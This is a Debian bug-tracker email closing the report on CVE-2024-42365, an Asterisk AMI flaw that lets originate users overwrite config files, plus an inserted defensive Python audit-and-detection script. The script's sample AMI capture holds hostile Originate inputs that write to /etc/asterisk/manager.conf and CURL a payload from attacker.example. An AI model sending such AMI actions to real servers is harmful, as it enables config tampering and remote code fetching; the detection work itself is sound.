Your message dated Sat, 07 Sep 2024 21:04:48 +0000
with message-id <e1sn2bw-005z6c...@fasolo.debian.org>
and subject line Bug#1078574: fixed in asterisk 1:20.9.3~dfsg+~cs6.14.60671435-1
has caused the Debian Bug report #1078574,
regarding asterisk: CVE-2024-42365
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
1078574: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078574
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: asterisk
Version: 1:20.8.1~dfsg+~cs6.14.40431414-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>

Hi,

The following vulnerability was published for asterisk.

CVE-2024-42365[0]:
| Asterisk is an open source private branch exchange (PBX) and
| telephony toolkit. Prior to asterisk versions 18.24.2, 20.9.2, and
| 21.4.2 and certified-asterisk versions 18.9-cert11 and 20.7-cert2,
| an AMI user with `write=originate` may change all configuration
| files in the `/etc/asterisk/` directory. This occurs because they
| are able to curl remote files and write them to disk, but are also
| able to append to existing files using the `FILE` function inside
| the `SET` application. This issue may result in privilege
| escalation, remote code execution and/or blind server-side request
| forgery with arbitrary protocol. Asterisk versions 18.24.2, 20.9.2,
| and 21.4.2 and certified-asterisk versions 18.9-cert11 and
| 20.7-cert2 contain a fix for this issue.


If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2024-42365
    https://www.cve.org/CVERecord?id=CVE-2024-42365
[1] https://github.com/asterisk/asterisk/security/advisories/GHSA-c4cg-9275-6w44

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore

--- End Message ---
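Two practical checks that follow from the advisory text above, added here as an illustration and not part of the Debian report, the Asterisk project, or the upstream fix: first, which users in manager.conf hold the `originate` write privilege the advisory requires (directly or through `all`); second, a scan of an AMI text capture (the plain "Key: value" wire format, one message per blank-line-terminated block) for Originate requests whose Application/Data reach the FILE() or CURL() dialplan functions or mention /etc/asterisk, which is the pattern the advisory describes. The manager.conf snippet and the AMI capture are constructed samples; the function names in RISKY_FUNCTIONS and the "targets /etc/asterisk" heuristic are assumptions drawn from the advisory wording, and the FILE()/CURL() arguments in the sample are illustrative rather than a verified exploit.

```python
"""Checks for AMI Originate abuse of the kind described in CVE-2024-42365.

users_with_originate():  AMI users whose write= grants `originate` or `all`.
find_risky_originates(): Originate actions in an AMI capture that reach
                         FILE()/CURL() or reference /etc/asterisk.
All sample inputs below are constructed, not real configs or captures.
"""
import re

# Assumption: functions worth flagging, taken from the advisory's wording
# (FILE via Set, curl-to-disk). Extend for your own deployment.
RISKY_FUNCTIONS = ("FILE(", "CURL(")
CONFIG_DIR = "/etc/asterisk"


def parse_asterisk_conf(text):
    """Minimal parser for Asterisk INI-style configs: [section] headers
    (template markers like [name](!) tolerated), `key = value` or
    `key => value` lines, ';' comments. Repeated keys are kept in order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        header = re.match(r"\[([^\]]+)\]", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, [])
            continue
        kv = re.match(r"([^=]+?)\s*=>?\s*(.*)", line)
        if kv and current is not None:
            sections[current].append((kv.group(1).lower(), kv.group(2)))
    return sections


def users_with_originate(manager_conf):
    """Map user section -> sorted write perms, for users able to Originate."""
    hits = {}
    for name, pairs in parse_asterisk_conf(manager_conf).items():
        if name == "general":
            continue
        perms = set()
        for key, value in pairs:
            if key == "write":
                perms.update(p.strip().lower() for p in value.split(",") if p.strip())
        if "originate" in perms or "all" in perms:
            hits[name] = sorted(perms)
    return hits


def parse_ami_messages(capture):
    """Split AMI wire text into dicts; keys are lower-cased."""
    messages, current = [], {}
    for raw in capture.splitlines():
        line = raw.rstrip("\r")
        if not line.strip():
            if current:
                messages.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip().lower()] = value.strip()
    if current:
        messages.append(current)
    return messages


def find_risky_originates(capture):
    """Return Originate actions that touch FILE()/CURL() or /etc/asterisk."""
    findings = []
    for msg in parse_ami_messages(capture):
        if msg.get("action", "").lower() != "originate":
            continue
        # Application/Data name the dialplan app and its arguments; Variable
        # is scanned too because it can carry function assignments.
        blob = " ".join(msg.get(k, "") for k in ("application", "data", "variable")).upper()
        reasons = [fn.rstrip("(") for fn in RISKY_FUNCTIONS if fn in blob]
        if CONFIG_DIR.upper() in blob:
            reasons.append("targets " + CONFIG_DIR)
        if reasons:
            findings.append({"actionid": msg.get("actionid", ""),
                             "application": msg.get("application", ""),
                             "reasons": reasons})
    return findings


# Constructed sample manager.conf (secrets are placeholders).
SAMPLE_MANAGER_CONF = """\
[general]
enabled = yes
bindaddr = 127.0.0.1

[monitor]
secret = placeholder   ; read-only dashboard account
read = system,call,log
write =

[dialer]
secret = placeholder
deny = 0.0.0.0/0.0.0.0
permit = 10.0.0.0/255.0.0.0
read = call
write = call,originate

[superuser]
secret = placeholder
read = all
write = all
"""

# Constructed sample AMI capture: one benign call, two suspicious Originates.
SAMPLE_CAPTURE = """\
Action: Login
Username: dialer
Secret: placeholder

Action: Originate
ActionID: 7
Channel: Local/s@public
Application: Set
Data: FILE(/etc/asterisk/manager.conf)=[injected]

Action: Originate
ActionID: 8
Channel: PJSIP/alice
Exten: 200
Context: internal
Priority: 1

Action: Originate
ActionID: 9
Channel: Local/s@public
Application: Set
Data: CURL(http://attacker.example/payload)
"""

if __name__ == "__main__":
    print("AMI users able to Originate:", users_with_originate(SAMPLE_MANAGER_CONF))
    for f in find_risky_originates(SAMPLE_CAPTURE):
        print("ActionID %s: %s (%s)" % (f["actionid"], f["application"], ", ".join(f["reasons"])))
```

The config audit is the durable check: on a pre-fix Asterisk, every account listed by users_with_originate() should be treated as having roughly the reach of a `system` user, so review whether each one really needs `originate`. The capture scan is for incident review of AMI traffic (for example a port 5038 session reconstructed with tcpdump/tshark); it is a string heuristic, so treat its hits as leads to inspect, not proof of exploitation.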
--- Begin Message ---
Source: asterisk
Source-Version: 1:20.9.3~dfsg+~cs6.14.60671435-1
Done: Jonas Smedegaard <d...@jones.dk>

We believe that the bug you reported is fixed in the latest version of
asterisk, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1078...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jonas Smedegaard <d...@jones.dk> (supplier of updated asterisk package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sat, 07 Sep 2024 22:14:21 +0200
Source: asterisk
Architecture: source
Version: 1:20.9.3~dfsg+~cs6.14.60671435-1
Distribution: unstable
Urgency: high
Maintainer: Debian VoIP Team <pkg-voip-maintain...@lists.alioth.debian.org>
Changed-By: Jonas Smedegaard <d...@jones.dk>
Closes: 1078574
Changes:
 asterisk (1:20.9.3~dfsg+~cs6.14.60671435-1) unstable; urgency=high
 .
   [ upstream ]
   * new release(s)
     + add entries to Originate blacklist;
       CVE-2024-42365;
       closes: bug#1078574, thanks to Salvatore Bonaccorso
     + test for NULL ub_result in unbound_resolver_callback;
       CVE-2024-42491
 .
   [ Jonas Smedegaard ]
   * fix minor privilege escalation; thanks to Niels Galjaard
   * update watch file: track mp3 component from git clone
   * unfuzz patch 2012
   * set urgency=high due to security-related bugfixes
Checksums-Sha1:
 3fe5e9180f43555bec8ca7c5cae590a689975617 5350 asterisk_20.9.3~dfsg+~cs6.14.60671435-1.dsc
 450b21cbdd4f92f333b02d202e445b443acb0b2a 11268 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xamr.tar.xz
 3d0a0b6cd89a39935fd096e2ef6e79ba8302c8eb 22024 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xmp3.tar.xz
 efd36da4be8883797c8ccb0ca1a41b933c1f19c9 22548 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xopus.tar.xz
 cb340d770d39567f887f0a81e96d35e43360b5ed 6343840 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xpjproject.tar.xz
 9c15c81d8106a5f95d1463034b155ba67c6cdccc 7362692 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig.tar.xz
 45cada41712eec20574c000e06153ec8fe958ee4 136192 asterisk_20.9.3~dfsg+~cs6.14.60671435-1.debian.tar.xz
 ad1772535c2e72ce90d03701f042286d02c89f1a 25080 asterisk_20.9.3~dfsg+~cs6.14.60671435-1_amd64.buildinfo
Checksums-Sha256:
 768fc371867d258cbf1f2eb2978d09795ae6fb9777d6dae0b6231f0faf674756 5350 asterisk_20.9.3~dfsg+~cs6.14.60671435-1.dsc
 ba0e753d9e008ad4d55c112dd0dd628fa3ce57e85f7ca5ff117fdc47e90021d8 11268 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xamr.tar.xz
 a5316a4cf442be734e050d6fcd28ee23d7057d0cc546413aa75872b84e979f21 22024 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xmp3.tar.xz
 1dc2659ade0eb9207a5d22df188690d1528e74374f1e0dbef4a74d824c90c9cf 22548 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xopus.tar.xz
 faa3dcf960be6d0b96c21d46d2135e4cf047802bc39004b042c51fd6d41070e1 6343840 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xpjproject.tar.xz
 800f6352418d13be892114d7e111034952e6c45f7d5ef31c1fc3738357fbccb5 7362692 asterisk_20.9.3~dfsg+~cs6.14.60671435.orig.tar.xz
 0049e3dc4ebe06b7e6cfba7d04d5b7b0250899b00fbee91d115acb8ae5dd0fa1 136192 asterisk_20.9.3~dfsg+~cs6.14.60671435-1.debian.tar.xz
 d43ec3f4c9edfe3a8cbe9e68377217dcc0dbfd859199b8056ad9970eb0831854 25080 asterisk_20.9.3~dfsg+~cs6.14.60671435-1_amd64.buildinfo
Files:
 90b2bd72589620b16c8891f2fa4268ae 5350 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435-1.dsc
 2f288da7d163b555955e1351203cb972 11268 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xamr.tar.xz
 5bdeadbbd8e5b6cc2f65a846e6859b7e 22024 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xmp3.tar.xz
 a28346e11689859feea371218e977f53 22548 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xopus.tar.xz
 d97bc16dd8abacb0bcf4b816da13573e 6343840 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435.orig-Xpjproject.tar.xz
 96d1fb65177e1dcce29eea9d348736bf 7362692 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435.orig.tar.xz
 7aa37871dccc0244db26197b383ed076 136192 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435-1.debian.tar.xz
 aa39013d223d893886cd1a9680e3dad9 25080 comm optional asterisk_20.9.3~dfsg+~cs6.14.60671435-1_amd64.buildinfo



--- End Message ---